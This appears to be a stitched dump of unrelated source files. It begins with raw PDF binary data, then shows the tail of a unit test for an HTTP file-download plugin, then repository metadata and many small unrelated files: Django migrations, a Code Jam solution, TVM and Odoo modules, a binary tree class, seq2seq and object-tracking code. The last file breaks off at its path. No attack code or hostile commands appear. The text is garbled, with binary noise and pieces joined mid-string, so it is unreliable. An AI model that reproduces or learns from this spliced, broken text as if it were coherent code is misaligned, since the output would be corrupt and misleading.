�����V}9,ĺ����~C�N������ ��p��jo�L�sX����[�uwa��Z����N�F�8��!;�m"=~��)�I79����:�k ])=�<k���U���V��U`��O;�"́UD���w�c�uz%��M�?s~#|�~�i��'@�� �C���8z�җ�4ԒV9�p��r�P�5�Y�|���ԭ�Y"�%F���:���l�� .a/`�㘂9����tR��h�����	�%D*���K����';��c=�����U�o��ʔ��ϙ��?��һy��═��l\�a�����p���ٷQ�`�m�$�Wgq�У(L6 @2�M�[ό�͋��~�<���֎E..��F�c��N���5ȵ��쯖~�>ҭ��T��Ѝ���1�h*�e}@LQ�#�R��y����o�ϮM�~Ę���<Y�L���}HE�h~�D(�г(��L���iw)t��vm�6��t�A3�*T�1������偞�Jw�<����+n�@\4Q�uX^:�OD�����>#|�n�q~�~�$�fќ��9�#�AdЍ�C�RV���t�����n|��7�y�o
֢��\�q��eE1�����߻�a���f��!U���n�_rD���D#=�;����n�(% ��^VCy�T����-y���h�c������ �$�&m��am9�,�݈��А�<���Ɍ
I�p�z�c�Ĕ9���=]n��1=�؜y���h!�&�8�Hn�:�τR��S������9�x_�q6&ߪo��ٷ/ܽ&��gT�ĵ �I���P49$��IE��ۨ�`i-�fo��|-�TRntC$E��[���0�^?�NDJ�˴��N�ة}�i� ;�K O\�;K^
�������{m�cz53c!�?*�0��5�}'*RH��3�U`��J�[١���`��9��?�Bj�F�����0HzB=U/���,Wh�gQj��X�ڥ<A��
�x"\��s���8�6)�*�ړ}4	�ˁc����;>|��U6\�J6J�j��L�45e2Q�,�#��]$����HU!�3-b�kJ����US�<���������+rZ`􇻖Z#��
|�}��{�f*1��@�i��ID~�B�UA�Ɛ�b��<�)��g��ܾ2�,Z��;WH���bGiI��,�7�&ͦ�Yds�M���X��$F̯q7c�~o3s�6�ְպTdb�_�G$fxF[��Y�	�fsx
��k5^�? v;����c�]�z����o�\���߉��|�2+�I�]JZ
���̵���U�a����|����ڟ���i�W��U�rR���\0�B�/��M��@H�,��@j�Y�;va���n#j-s�+Y|�P���K��=C�h��V���ۛ��u�e��ā\TS椉5>-R�s�gش���?WǮ-��Ha9H*���3��wD��"�K��K�σ���_Ҝ)9j pv�eE�j;Z�J~=@�ŉ��d��j�X���(��#�˭K`T�Ş�x�F&� zD��pGz� �N������d��Ȩ`��PX�;Į4�-'wH+��Dt	J�aM��!f7<��[ ��Y���w�w�H+Dc�I�l~���j����=���Rǵ\�C�Ȥ�;���8h�H�K��[nV�fP)��\'kJ��Mc���S�r}w�~>xf�F�5c���aC\���t�	�q��p�b����+�So5ȸ������+(Z�դ��b�M����h�F� 9�Β�� �5���:� ��1)�͏�܈�I"��>�u�K%��fH����`�oT8�8�M	�Z��fW�X}�Vf,)�Ԍ�2;+�}s��*^�ƻk�ʠF]<IIbD��
K�����]:�'X{o5g�L=B��pHr{b�Zd��>��G*����%���`�]��O�>��#�D�*�Y&��W�~�i�|$�4p&
9�)K�o��pZ�ς�r���kT;��R��+��@�w����tQ��͚�pĢ���E�u��b�n6-ԋ�� RkY~�oB�m��Q�ߥkD����D��·40���;`��peNg�f��,.�k��E��Qg����z_^
ѯ�q-���Gi�}r�+���S���W�� \�����m
�`����U���g��+onA�6P�bAhN2ݵbC����G Ws�M���:�ß��B߯��|�O��f��;��Yݲ\���P��ŜP<Q$zo�<Z�W�G�:�e�6e����6!���\�oѫц 9ƷC��i����ڦ���}��X(�(O4n���(�Rt7vM���َ�|Z9��P�7Q��F8��z8��gd�TQB��N�Q��{���F��B��N#׊�	+��$3�c��
�Tf�zִ��(_���X�e��Y����Ǐ�}cr$���v�4�s�G�l����� ]���Zi;e0�=EL��݆Zh���=[0H�B:9ʒGpw�Lϟ�b˜Ga�)^����v��0�|I���!�G��M<x�*%@���2�vs��ǩiW9��WD��^�-\��P)�t_V�<ɍw�h`d�Rv�gˠ�J�Ð���:�N*Ș7�?`2W������'�)����~�Ap�~[\�
�e����gD��R�ZT�c�O'��1��ρ*����f�q���ZyG*�5�����2:���A.|C��s6�^��6���R��7�"Qz�:�yKW���E9�a�o��}93�'���ŷ����Y<5�M�0��o�C{+�q�𥰬���}qf�u���K�N���W��k�vv��dd�Q�� Yߊ?"�	�yhj��RZ�'���W�P@q~~2�K�o���%8)�G��w��@�d*quB5xn�i�{V���g����j�L�n�$�@�У�J-�c�����x��v�ҋ�wX��G������P�DS�*��D�FoRE;�����`��f�tY�,��i||��U}��-� ["������$��ay�4@hcP�ّ��ذ������͵��o��]]vv;�V<`��r�$�H�g�N��{*�(I�le]F"�b�e�R0������ׅMi�A�ت�?�G�˹���N�Ep�O4�6�X�ї��?����qѳŗUv8y~B�� ��e���/��c(,���xX~N�ĩ����,%�:�CX�R�4xzS�)ƻ���A+� L���H���:G����r�C���fhI�{���ܦ���6a�ַ1P��b���sSR��W悏�i��b��y˻Jܗ��}���;�&RL���D;��q�PL�F��֘��\�3�x0��?oa%�����/�yQ�������LӠ�6"�����6�}��}6�bih@8���c��+�����|�:�}Z]�5�Ӵdސ�e\է	���w�?�T8U�����/�Qe���7V�Wg��
O���\�Ss��,���7��V�zbh
�}�L|�i$|�7��%"�/B*9H��Z��G֍��P9�z�P����"�$0�ԿCu���Ǧ�YCBTV�I߽��W) d�+�b�����ӏn{��,麱��i�vqu����e��ǐCER�J.�ٹԷ$e�	����|WD�Xb�{ͽk�{�>�m�K�G�DNh,��X1b4�������'TfE��x�4l�$���oK�ss���S����B��]n,��)~��_��[7�@��������-��{�����F�Ы�u=�s�h~�4���:a-�-5���
�	�@���W^ߡ(��Q�%M�BRKeL��<���Y��a%#���,Ml��s���ܵđ�GP��X$�[��S���5�F#P5����w���>v	��biT̵��rV-��Y3E�7��h:�N�o����!������W�P��ᙛ�$��YA�J�I��^w]OO��#��0Fm�;��|c�N�*�)̴�K�di�n]��V"�A:?@������PCd	��*px����_���M���e⁉�ل8g����(��d<	A&E�Ż����hO�Sտg\�l�r����t-JGE0,�N��z������� �?G1כ�QC�+ȽC�k�k8۵�/�c$�#��H��=�KN�F���Ʉq8^\���������پd���O�ӳ%i��=���+�7H��Ĩ�Y1ٖ�Xǵ�3�+�f��KC:�}�aWM�}z���N��U��F�P �d�>��X�p����t��y�d$�\#�㪫�s������(*WeMo��z�Lg��X�E3��ޞ�������M�u�qq��%̇�6|<Ɖ��`]���������w����5��թ��F��ػ��Һ�P�^�'�e^P_�����3�m�t,@���P�{ᗗ�Y]�����΋��J�t�̒-�eDgM������9]oqg�*9��$���okH���O��4�RZzI��tCV��l��ͧ-st_He��80��:gj��[Hʥ���8Lh�?]G�:
endstream
endobj
10 0 obj
<< /Filter /FlateDecode /Length 740 >>
stream
x�mU�n�0��+��J�b;$�
!�	�8�*�j���n$H�$����#�l{ ����3�`�~�l'�l�f>r�j���f��ܵ��]�瓩�_Ɣ�g�'��5���>�d��,yS�siF��$mޫ�S��3&ũ|�?Wǡ�'ܷj8Z�w����M��%�M�WM���#���u�6'x��E���U]v1li������2r���o?���6��	�K6}����}8����+MW����F��ٞ��h���`�b�9؆����ɰ�w�����0�ƂTMi�vW�nW��`���-�|���o.���HM,����h,eh��Q��&CM��-���,���8Q�`q�L0��h�z(�P��.Vר �������,�h,%��%ա���5���8�8pL������B���$q�Ʃ/0��8�x��?r��x�y!�B��=�X������y���82�VAנp�"����Z�q�x�8tkxΛ��_�����S�8k�H`�����n���k̀��RONH=CpB:#=�%8��88њ�BC��/�9�!ɨ~B�}���Rq҉�T��FI��ܨ�ύ�|nT�s���|neEA��xw���I}�Ɵ����I��y��k�t��g>O:�yұϓN|����I/|���y���I�>O:�y�k�'��<���)>O��yJg�;s�|�K�ۄw���箳�{l�C�'����=n����=���F�y���P
endstream
endobj
11 0 obj
<< /Type /ObjStm /Length 522 /Filter /FlateDecode /N 5 /First 32 >>
stream
x�uSYk�@~ﯘǖb�ޒ b�!m	�{���I�HFR ����U�M҂4��ͱ3\ .A+�����Hg �����kG�ϝ/�����]��#�{�����d�Q�b�>��W�?�>.��8#��qQ=p�/�P��a�z�ա��ه���ǃ�DI�t�ۦ�v��o�9�����zp}�B}5��l{���8����ț�����ub&�I�ȉ�4M2��[{󧚁R*QA"��'�L��I>�ED�KHs�b/�e���mQy�*��xSE@U�+=Рq��,s5�����d�Fa�k,�T�z?ix�AG}�!�f�O:;�K�"��'|�əxNO�����k.��^#����o*N�S���C�Z���YC�t���b(--���bq�l��&1�$Ҟ�3z�����5Xa���P��c�]k�=? ��qh3�����@���ϻGZ�]�L���o��fo!G��oŽ}}�Wc�oʋ�"Wף��A��W�,���Q��z���_
endstream
endobj
1 0 obj
<< /CreationDate (D:20211216143257Z) /Creator (TeX) /ModDate (D:20211216143257Z) /PTEX.Fullbanner (This is pdfTeX, Version 3.141592653-2.6-1.40.23 \(TeX Live 2021\) kpathsea version 6.3.3) /Producer (pdfTeX-1.40.23) /Trapped /False >>
endobj
2 0 obj
<< /Type /XRef /Length 21 /Filter /FlateDecode /DecodeParms << /Columns 4 /Predictor 12 >> /W [ 1 2 1 ] /Size 3 /ID [<4dac181eb10e569cb7930abd3bbd36e1><f8f4a6b9f7562a333372614367963140>] >>
stream
x�cb &F�^&�_ ��
endstream
endobj
               
startxref
216
%%EOF
", "status_code": 200, } self.assertEqual(actual, expected) def test_get_txt_file(self, mock_get, mock_create_url, mock_cach): actual = self.action.run({Input.URL: "https://test.com/v1/test.txt", Input.IS_VERIFY: False}) expected = { "bytes": "dGVzdAp0ZXN0IGZpbGUKc29tZSB0ZXN0IGRhdGE=", "status_code": 200, } self.assertEqual(actual, expected) def test_get_txt_file_with_checksum(self, mock_get, mock_create_url, mock_cach): actual = self.action.run( { Input.URL: "https://test.com/v1/test.txt", Input.CHECKSUM: "5084335576ea9ec4e9d1dcd7536dec3713b3a57a", Input.IS_VERIFY: False, } ) expected = { "bytes": "dGVzdAp0ZXN0IGZpbGUKc29tZSB0ZXN0IGRhdGE=", "status_code": 200, } self.assertEqual(actual, expected) def test_get_txt_file_with_bad_checksum(self, mock_get, mock_create_url, mock_cach): with self.assertRaises(PluginException) as context: self.action.run( { Input.URL: "https://test.com/v1/test.txt", Input.CHECKSUM: "5084335576ea9ec4e9d1dcd7536dec3713b3a57aa", Input.IS_VERIFY: False, } ) self.assertEqual( "Checksums between the downloaded file and provided checksum did not match.", context.exception.cause ) self.assertEqual( "Verify the file you meant to download and the checksum you provided are correct.", context.exception.assistance, ) @patch("insightconnect_plugin_runtime.helper.open_url", side_effect=Util.mocked_url_open) def test_is_verify(self, mock_get, mock_request, mock_create_url_meta, mock_open_cache): actual = self.action.run({Input.URL: "https://test.com/v1/test.txt", Input.IS_VERIFY: True}) self.assertTrue(mock_get.call_args_list[0][1].get("verify"))
85ae61cc05563eee47e7f771d1f64d635a86292e
192dec1ea734fd67a3c3720228826cf754b2da5a
/valeo/vr/apps.py
b88f93e9775d8048cb831c38beadcdde6919dbff
[]
no_license
fafaschiavo/cpi_valeo
a4df4e64161e58e44ade276f0b6284abfb5af6d2
777ef6173bbc4bf5941098cb2ea3b13fccf490c1
refs/heads/master
2020-04-06T04:14:59.226013
2017-05-02T22:39:00
2017-05-02T22:39:00
82,980,893
0
0
null
null
null
null
UTF-8
Python
false
false
120
py
from __future__ import unicode_literals from django.apps import AppConfig class VrConfig(AppConfig): name = 'vr'
5113f8bf9f0595543e85f6a8f9655e1f589b4282
6d724d9326ede63fd940cc5d39920f38d987e716
/shop/migrations/0004_orders_orderupdate.py
9b38da972769d22736faa52aba4630c6afddc452
[]
no_license
Alan-thapa98/mac
5dea8254276ce79fd7f11e20772b43e3a9943602
a5317bcb1d6b1fde9b726dc2b0c99ddd85f18b45
refs/heads/master
2023-07-11T05:45:05.075152
2021-07-30T12:00:02
2021-07-30T12:00:02
391,047,535
2
0
null
null
null
null
UTF-8
Python
false
false
1,370
py
# Generated by Django 3.1.2 on 2021-01-24 12:43 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('shop', '0003_contact'), ] operations = [ migrations.CreateModel( name='Orders', fields=[ ('order_id', models.AutoField(primary_key=True, serialize=False)), ('items_json', models.CharField(max_length=5000)), ('amount', models.IntegerField(default=0)), ('name', models.CharField(max_length=90)), ('email', models.CharField(max_length=111)), ('address', models.CharField(max_length=111)), ('city', models.CharField(max_length=111)), ('state', models.CharField(max_length=111)), ('zip_code', models.CharField(max_length=111)), ('phone', models.CharField(default='', max_length=111)), ], ), migrations.CreateModel( name='OrderUpdate', fields=[ ('update_id', models.AutoField(primary_key=True, serialize=False)), ('order_id', models.IntegerField(default='')), ('update_desc', models.CharField(max_length=5000)), ('timestamp', models.DateField(auto_now_add=True)), ], ), ]
[ "alanthapa98.gmail.com" ]
alanthapa98.gmail.com
d3a903414652662f91ef2a9f09ed1a87342d49bf
15f321878face2af9317363c5f6de1e5ddd9b749
/solutions_python/Problem_201/436.py
78e4a99556ff805c431b31596155fa8617440523
[]
no_license
dr-dos-ok/Code_Jam_Webscraper
c06fd59870842664cd79c41eb460a09553e1c80a
26a35bf114a3aa30fc4c677ef069d95f41665cc0
refs/heads/master
2020-04-06T08:17:40.938460
2018-10-14T10:12:47
2018-10-14T10:12:47
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,143
py
f = open('C:\\Users\\djspence\\Downloads\\C-large.in', 'r') tries = int(f.readline()) for case in range(0, tries): lengths = {} vals = f.readline().strip().split(' ') n = int(vals[0]) remaining = int(vals[1]) lengths[n] = 1 small = 0 large = 0 while remaining > 0: lk = lengths.keys() maxLen = max(lk) num = lengths[maxLen] del lengths[maxLen] if maxLen%2 == 1: small = maxLen/2 large = maxLen/2 if small in lk: lengths[small]=lengths[small]+2*num else: lengths[small]=2*num else: small = maxLen/2-1 large = maxLen/2 if small in lk: lengths[small]=lengths[small]+num else: lengths[small]=num if large in lk: lengths[large]=lengths[large]+num else: lengths[large]=num remaining = remaining - num print("Case #" + str(case+1)+": " + str(large) + " " + str(small))
1898f53db1e53665c6f69f9ef8b54411b060dd23
75983ccc6e1eba55890429baace2bf716ac4cf33
/python/tvm/relay/ir_pass.py
84189c840d71a5dccdc08b92a22eb837b2fb5405
[ "Apache-2.0" ]
permissive
clhne/tvm
49c8be30c87791d5e8f13eea477620a829573d1c
d59320c764bd09474775e1b292f3c05c27743d24
refs/heads/master
2020-03-29T21:16:30.061742
2018-09-25T19:15:15
2018-09-25T19:15:15
150,358,639
1
0
Apache-2.0
2018-09-26T02:41:46
2018-09-26T02:41:45
null
UTF-8
Python
false
false
372
py
# pylint: disable=no-else-return, # pylint: disable=unidiomatic-typecheck """The set of passes for Relay. Exposes an interface for configuring the passes and scripting them in Python. """ from . import _ir_pass # Expose checking expression, should rename to infer_type. # pylint: disable=invalid-name check_expr = _ir_pass.check_expr well_formed = _ir_pass.well_formed
95b7481abd5da44b653139b6e671965a8b6bc81e
2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae
/python/python_24692.py
165e8518e2ba9cad5538a7ef480b9d654979df4a
[]
no_license
AK-1121/code_extraction
cc812b6832b112e3ffcc2bb7eb4237fd85c88c01
5297a4a3aab3bb37efa24a89636935da04a1f8b6
refs/heads/master
2020-05-23T08:04:11.789141
2015-10-22T19:19:40
2015-10-22T19:19:40
null
0
0
null
null
null
null
UTF-8
Python
false
false
63
py
# Python NameError: name 'self' is not defined Why? python -tt
2a04c078859847f83b2a810252c0bd0a2a0367e9
da052c0bbf811dc4c29a83d1b1bffffd41becaab
/core/web_debranding/__manifest__.py
2626a321be85b590c2375e95e0b69f7ad52c0bfc
[]
no_license
Muhammad-SF/Test
ef76a45ad28ac8054a4844f5b3826040a222fb6e
46e15330b5d642053da61754247f3fbf9d02717e
refs/heads/main
2023-03-13T10:03:50.146152
2021-03-07T20:28:36
2021-03-07T20:28:36
null
0
0
null
null
null
null
UTF-8
Python
false
false
824
py
# -*- coding: utf-8 -*- { 'name': "Backend debranding", 'version': '1.1.1', 'author': 'IT-Projects LLC, Ivan Yelizariev', 'license': 'LGPL-3', 'category': 'Debranding', 'images': ['images/web_debranding.png'], 'website': 'https://twitter.com/yelizariev', 'price': 150.00, 'currency': 'EUR', 'depends': [ 'web', 'mail', 'web_planner', 'access_apps', 'access_settings_menu', 'mail_base', ], 'data': [ 'security/web_debranding_security.xml', 'security/ir.model.access.csv', 'data.xml', 'views.xml', 'js.xml', 'pre_install.yml', ], 'qweb': [ 'static/src/xml/web.xml', ], 'auto_install': False, 'uninstall_hook': 'uninstall_hook', 'installable': True }
6997ba18d8ad2fb05c77cb9cbd2942726bf65798
fd4aba49cbd4042a95e7376eac245df0e95b72d3
/auto-generated/python/test/test_margin.py
a5287ac7cde2c798af31194cd8a629e51b3cef2c
[]
no_license
bretton/api-connectors
47755e7ec4701a600b3bf6a541c618573e97e365
e8b9de34ff941c3edae2b094f6ab0eb1c24bf8bb
refs/heads/master
2020-04-14T20:01:38.746415
2019-12-20T11:43:05
2019-12-20T11:43:05
164,079,343
2
2
null
2019-12-20T11:43:06
2019-01-04T08:21:45
C++
UTF-8
Python
false
false
2,277
py
# coding: utf-8 """ BitMEX API ## REST API for the BitMEX Trading Platform [View Changelog](/app/apiChangelog) #### Getting Started Base URI: [https://www.bitmex.com/api/v1](/api/v1) ##### Fetching Data All REST endpoints are documented below. You can try out any query right from this interface. Most table queries accept `count`, `start`, and `reverse` params. Set `reverse=true` to get rows newest-first. Additional documentation regarding filters, timestamps, and authentication is available in [the main API documentation](/app/restAPI). *All* table data is available via the [Websocket](/app/wsAPI). We highly recommend using the socket if you want to have the quickest possible data without being subject to ratelimits. ##### Return Types By default, all data is returned as JSON. Send `?_format=csv` to get CSV data or `?_format=xml` to get XML data. ##### Trade Data Queries *This is only a small subset of what is available, to get you started.* Fill in the parameters and click the `Try it out!` button to try any of these queries. * [Pricing Data](#!/Quote/Quote_get) * [Trade Data](#!/Trade/Trade_get) * [OrderBook Data](#!/OrderBook/OrderBook_getL2) * [Settlement Data](#!/Settlement/Settlement_get) * [Exchange Statistics](#!/Stats/Stats_history) Every function of the BitMEX.com platform is exposed here and documented. Many more functions are available. ##### Swagger Specification [⇩ Download Swagger JSON](swagger.json) ## All API Endpoints Click to expand a section. # noqa: E501 OpenAPI spec version: 1.2.0 Contact: [email protected] Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import import unittest import swagger_client from swagger_client.models.margin import Margin # noqa: E501 from swagger_client.rest import ApiException class TestMargin(unittest.TestCase): """Margin unit test stubs""" def setUp(self): pass def tearDown(self): pass def testMargin(self): """Test Margin""" # FIXME: construct object with mandatory attributes with example values # model = swagger_client.models.margin.Margin() # noqa: E501 pass if __name__ == '__main__': unittest.main()
db166c5dcc339e356cf775d43a928a65440502ce
7130a96ef7c2199cdb52406069fdc5e015760d70
/components/docker/block/SPResnetBlockV2.py
858733a371f31bb60c735dd0184b8db52d6b793f
[]
no_license
yanqinghao/AiLab-Pytorch
c37e8f47241d7f1a003226b2a19b9406ff7f6f9b
ceea8a1196dca4d219a099cbaedcecf7c3f96564
refs/heads/master
2021-07-08T07:15:29.801492
2020-10-23T06:14:34
2020-10-23T06:14:34
198,990,470
0
0
null
2019-08-14T09:23:00
2019-07-26T09:40:58
Python
UTF-8
Python
false
false
734
py
# coding=utf-8 from __future__ import absolute_import, print_function import suanpan from suanpan.app.arguments import Int from suanpan.app import app from args import PytorchLayersModel from utils import getLayerName, net @app.input(PytorchLayersModel(key="inputModel")) @app.param(Int(key="inplanes", default=64)) @app.param(Int(key="planes", default=64)) @app.output(PytorchLayersModel(key="outputModel")) def SPResnetBlockV2(context): args = context.args model = args.inputModel name = getLayerName(model.layers, "ResnetBlockV2") setattr(model, name, net.ResnetBlockV2(args.inplanes, args.planes)) model.layers[name] = getattr(model, name) return model if __name__ == "__main__": suanpan.run(app)
87503f32f0ebd1aa3c6acc09980ebdaeb4ed6a34
0438cb6726cd47f17b75cc960d457e433beeed95
/tests/test_cli.py
7e6cc9f4c08378936ae125b5e9812674ea17fbb7
[ "MIT" ]
permissive
boydgreenfield/metasort
3071aa4600f6b5f0ba9eeb431b1cbcc7c1399102
27622d75f36b1dde959c269cb90b57f4110d813b
refs/heads/master
2021-01-22T20:39:08.266721
2015-04-10T18:57:12
2015-04-10T18:57:12
33,745,227
0
0
null
2015-04-10T18:53:23
2015-04-10T18:53:23
null
UTF-8
Python
false
false
49
py
from nose.tools import * def test_base(): pass
c7049fd951803d6bc6f19109023f9ea5c5d783c2
a3e4cc590667c444460d3a1f659f53f907da1783
/azure/mgmt/blueprint/models/assignment_deployment_job_result_py3.py
52b07be3a07c2f65071a62d8c0a9f5ad292585ef
[]
no_license
eduardomourar/azure-mgmt-blueprint
729d9c08915caab9e8029278da6dc87c4eaa44d6
153c3c63cb519350cb68752e07251e1e8ff26510
refs/heads/master
2020-05-27T02:26:42.436079
2019-11-11T11:52:14
2019-11-11T11:52:14
188,451,854
0
0
null
null
null
null
UTF-8
Python
false
false
1,334
py
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.serialization import Model class AssignmentDeploymentJobResult(Model): """Result of each individual deployment in a blueprint assignment. :param error: Contains error details if deployment job failed. :type error: ~azure.mgmt.blueprint.models.AzureResourceManagerError :param resources: Resources created as result of the deployment job. :type resources: list[~azure.mgmt.blueprint.models.AssignmentJobCreatedResource] """ _attribute_map = { 'error': {'key': 'error', 'type': 'AzureResourceManagerError'}, 'resources': {'key': 'resources', 'type': '[AssignmentJobCreatedResource]'}, } def __init__(self, *, error=None, resources=None, **kwargs) -> None: super(AssignmentDeploymentJobResult, self).__init__(**kwargs) self.error = error self.resources = resources
647577be7019d95438e3a5c1aa3b2dcbafb93134
c6053ad14e9a9161128ab43ced5604d801ba616d
/Public/Public_zqxt_99/__init__.py
4f5ee4f58760d9dfb875cffb3773d9d9dbf5771b
[]
no_license
HesterXu/Home
0f6bdace39f15e8be26031f88248f2febf33954d
ef8fa0becb687b7b6f73a7167bdde562b8c539be
refs/heads/master
2020-04-04T00:56:35.183580
2018-12-25T02:48:51
2018-12-25T02:49:05
155,662,403
0
0
null
null
null
null
UTF-8
Python
false
false
164
py
# -*- coding: utf-8 -*- # @Time : 2018/12/11/10:55 # @Author : Hester Xu # Email : [email protected] # @File : __init__.py.py # @Software : PyCharm
bf9b4c55e0e0b67ded0e6452ab8893a773b3fb88
d469de9070628b7c56e283066d9122eb73c42dd2
/algorithms/data_structures/binary_tree.py
7dad06d856241373ca5e8bfd012d65a0b853afdc
[]
no_license
Rowing0914/Interview_Prep_Python
af26369ccb92c623fc2ac44e62d3f61e94046df6
a77a9b2342fbc9fc87b9f3670b0f3ab36f47eac7
refs/heads/master
2022-11-26T10:22:44.564728
2020-08-07T12:06:54
2020-08-07T12:06:54
269,878,434
2
0
null
null
null
null
UTF-8
Python
false
false
923
py
class Node: def __init__(self, value): self.l = None self.r = None self.v = value class BinaryTree: def __init__(self): self.root = None def add(self, item): if self.root == None: self.root = Node(value=item) else: self._add(item, self.root) def _add(self, item, node): if item > node.v: print("right: ", item) if node.r == None: node.r = Node(value=item) else: self._add(item, node.r) else: print("lefft: ", item) if node.l == None: node.l = Node(value=item) else: self._add(item, node.l) def printTree(self): if self.root == None: print("Nothing") else: self._printTree(self.root) def _printTree(self, node): if node != None: self._printTree(node.l) print(str(node.v) + " ") self._printTree(node.r) if __name__ == '__main__': tree = BinaryTree() tree.add(3) tree.add(4) tree.add(0) tree.add(8) tree.add(2) tree.printTree()
843d02469e85866f10c030b14a8b34b1ddb154ba
cfcd117378664e4bea080b3c1011a25a575b3d51
/hawc/apps/vocab/migrations/0004_term_uid.py
f894ab0af5c902c93c900e051fb9821419084ebb
[ "MIT" ]
permissive
shapiromatron/hawc
9d3a625da54d336334da4576bd5dac6915c18d4f
51177c6fb9354cd028f7099fc10d83b1051fd50d
refs/heads/main
2023-08-03T13:04:23.836537
2023-08-01T18:39:16
2023-08-01T18:39:16
25,273,569
25
15
NOASSERTION
2023-09-14T17:03:48
2014-10-15T21:06:33
Python
UTF-8
Python
false
false
348
py
from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("vocab", "0003_load_v1"), ] operations = [ migrations.AddField( model_name="term", name="uid", field=models.PositiveIntegerField(blank=True, null=True, unique=True), ), ]
d0e245f285f7028136bf38a0f29d170d8c9f4d5a
8bb4a472344fda15985ac322d14e8f4ad79c7553
/Python3-Core/src/test/prompto/translate/eme/TestCss.py
801cb78f8fe015a3e6257711209c57258ee542a1
[]
no_license
prompto/prompto-python3
c6b356f5af30c6826730ba7f2ad869f341983a2d
64bd3d97d4702cc912097d41d961f7ab3fd82bee
refs/heads/master
2022-12-24T12:33:16.251468
2022-11-27T17:37:56
2022-11-27T17:37:56
32,623,633
4
0
null
2019-05-04T11:06:05
2015-03-21T07:17:25
Python
UTF-8
Python
false
false
767
py
from prompto.parser.e.BaseEParserTest import BaseEParserTest class TestCss(BaseEParserTest): def setUp(self): super(type(self), self).setUp() def testCodeValue(self): self.compareResourceEME("css/codeValue.pec") def testCompositeValue(self): self.compareResourceEME("css/compositeValue.pec") def testHyphenName(self): self.compareResourceEME("css/hyphenName.pec") def testMultiValue(self): self.compareResourceEME("css/multiValue.pec") def testNumberValue(self): self.compareResourceEME("css/numberValue.pec") def testPixelValue(self): self.compareResourceEME("css/pixelValue.pec") def testTextValue(self): self.compareResourceEME("css/textValue.pec")
e89461a51e52313d597915885da1df109637baae
ae288b9604ee86b471d698023fce03738b578544
/lib/system/__init__.py
d3474854c5d8888f77545f1a7a11a08f805ffc55
[]
no_license
snaress/studio
a8421a0772600494859ba86daace4bf499f8e055
90f4fc50ca9541c0d70cb381c8002ef8a3ce8087
refs/heads/master
2021-01-17T05:49:57.193795
2016-02-07T13:57:24
2016-02-07T13:57:24
25,691,833
0
0
null
null
null
null
UTF-8
Python
false
false
147
py
import os #-- Package Var --# toolPath = os.path.normpath(os.path.dirname(__file__)) toolName = toolPath.split(os.sep)[-1] toolPack = __package__
d531ac6b14b28efdbcaa7dbcc9edad4029ab4ccf
0ff562277646000e7f05c68e18133466effeb962
/seq2seq/evaluate.py
9356c281bfea4c511ab9d95e5d84048c069e162c
[]
no_license
zyxue/bio-seq2seq-attention
708fd8a73f69c8564d488c185dba792e3570cbed
692614f4d025c78800ecd6c104c430e2bff11edf
refs/heads/master
2020-04-16T21:34:59.626246
2019-02-22T00:42:40
2019-02-22T00:42:40
165,930,778
3
0
null
null
null
null
UTF-8
Python
false
false
1,839
py
import random import torch from seq2seq.plot import plot_attn # from seq2seq.utils import tensor_from_sentence, get_device def evaluate(src_lang, tgt_lang, enc, dec, tgt_sos_index, src_seq, seq_len): with torch.no_grad(): # shape: S X B X 1 src_tensor = tensor_from_sentence(src_lang, src_seq).view(-1, 1, 1) enc_hid = enc.init_hidden(batch_size=1) enc_outs, enc_hid = enc(src_tensor, enc_hid) if enc.bidirectional: # as the enc_outs has a 2x factor for hidden size, so reshape hidden to # match that enc_hid = torch.cat([ enc_hid[:enc.num_layers, :, :], enc_hid[enc.num_layers:, :, :] ], dim=2) device = get_device() dec_in = torch.tensor([[tgt_sos_index]], device=device).view(-1, 1) dec_hid = enc_hid dec_outs = [] dec_attns = torch.zeros(seq_len, seq_len) for di in range(seq_len): dec_out, dec_hid, dec_attn = dec(dec_in, dec_hid, enc_outs) dec_attns[di] = dec_attn.view(-1) topv, topi = dec_out.data.topk(1) dec_outs.append(tgt_lang.index2word[topi.item()]) dec_in = topi.detach() return dec_outs, dec_attns[:di + 1] def evaluate_randomly(src_lang, tgt_lang, enc, dec, tgt_sos_index, num, iter_idx): for i in range(num): src_seq, tgt_seq, seq_len = random.choice(pairs) print('>', src_seq) print('=', tgt_seq) prd_tokens, attns = evaluate( src_lang, tgt_lang, enc, dec, tgt_sos_index, src_seq, seq_len) prd_seq = ''.join(prd_tokens) print('<', prd_seq) acc = U.calc_accuracy(tgt_seq, prd_seq) print('acc: {0}'.format(acc)) plot_attn(attns, src_seq, prd_seq, acc, iter_idx)
07260035fae3775eccc23a0180c11509e81f5968
6b9084d234c87d7597f97ec95808e13f599bf9a1
/algorithms/tracker/transt/builder.py
f300dc026d1df2f2ed64f5f4be27d71f5490de44
[]
no_license
LitingLin/ubiquitous-happiness
4b46234ce0cb29c4d27b00ec5a60d3eeb52c26fc
aae2d764e136ca4a36c054212b361dd7e8b22cba
refs/heads/main
2023-07-13T19:51:32.227633
2021-08-03T16:02:03
2021-08-03T16:02:03
316,664,903
1
0
null
null
null
null
UTF-8
Python
false
false
1,328
py
import torch from models.TransT.builder import build_transt from algorithms.tracker.transt.tracker import TransTTracker from data.tracking.methods.TransT.evaluation.builder import build_evaluation_data_processors def build_transt_tracker(network_config, evaluation_config, weight_path, device): device = torch.device(device) model = build_transt(network_config, False) state_dict = torch.load(weight_path, map_location='cpu')['model'] if network_config['version'] <= 2: for key in list(state_dict.keys()): key: str = key if key.startswith('head.class_embed'): state_dict[key.replace('head.class_embed', 'head.classification')] = state_dict.pop(key) elif key.startswith('head.bbox_embed'): state_dict[key.replace('head.bbox_embed', 'head.regression')] = state_dict.pop(key) if network_config['backbone']['type'] == 'swin_transformer': from models.backbone.swint.swin_transformer import _update_state_dict_ _update_state_dict_(state_dict, 'backbone.backbone.') model.load_state_dict(state_dict) data_processor, network_post_processor = build_evaluation_data_processors(network_config, evaluation_config, device) return TransTTracker(model, device, data_processor, network_post_processor)
1dbec0cd8d756ebeae9a779507e72fa0e3c38631
3d06eeebdd598efba25d29d7e3d03d90ede1bfbd
/18_lesson(django)/video-shop/videostore/courses/forms.py
